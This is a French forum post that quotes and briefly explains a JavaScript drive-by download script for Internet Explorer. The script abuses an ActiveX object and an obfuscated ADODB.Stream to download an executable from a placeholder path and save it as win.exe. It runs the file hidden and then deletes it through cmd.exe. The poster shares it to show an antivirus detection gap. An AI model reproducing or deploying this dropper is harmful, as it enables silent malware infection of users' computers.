Le script en question permettant de sauvegarder sous IE le fichier exe malware
<script>
var ailian,zhan,cmdss;
ailian="ici le path vers l'exe";
zhan="win.exe";
cmdss="cmd.exe";
try{var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ln="Ado";
var lzn="db.St";
var an="ream";
var g=1;
var as=ado.createobject(ln+lzn+an,"");
var h=1;
xml.Open("GET",ailian,0);
xml.Send();
as.type=1
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(zhan,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(zhan,"","","open",0);
shell.ShellExecute(cmdss," /c del /S /Q /F "+zhan,"","open",0);}
catch(e){};</script>
en gros il sauvegarde un fichier du nom de win.exe qu'il execute ensuite
Source:
http://www.developpez.net/...
Je repete que selon les rapport de mise a jour de antivir les pattern de reconnaissance de ce vitus n'ont pas été modifié depuis 1 mois !!
Config:
Intel Core I7 920
Asus P6T Deluxe
BFG nVidia GTX280 O/C
Vista 64bits.